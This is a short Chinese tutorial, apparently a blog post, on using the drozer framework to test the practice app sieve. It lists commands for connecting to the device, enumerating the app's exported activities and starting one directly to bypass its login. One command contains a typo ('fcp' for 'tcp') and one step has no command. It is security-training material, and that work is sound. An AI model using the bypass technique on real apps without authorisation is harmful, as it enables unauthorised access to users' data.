安卓安全测试

drozer是一款针对Android系统的安全测试框架。它提供了很多安卓平台下的渗透测试。通过攻击测试,暴露安卓app的漏洞
 
  
这里以应用sieve做为应用,来讲解drozer的使用。
 
  
1 首先在PC端安装服务端,然后在手机上安装客户端
 
  
2 开启客户端的开关,进入drozer的路径,输入转发
 
  
  adb forward fcp:31415 fcp:31415
 
  
3 输入连接命令
  drozer console connect
 
  
4  获取app的包名
run app.package.list -f sieve
 
  
5 获取app的常规信息
run app.package.info -a  com.mwr.example.sieve
 
  
6 运用攻击命令,查询app的暴露的组件
 
  
 
  
 
  
7 根据上面的暴露组件,可以获取相关组件的详细信息,这里用activity
run app.activity.info -a com.mwr.example.sieve
 
  
 
  
8 这个时候,我们可以用获取的类名,进行攻击了。这个时候,看到可以绕过登陆,直接进入APP
run app.activity.start --component 包名 类名
 
  
 
  
 
  
 
  
 
 

你可能感兴趣的:(安卓安全测试)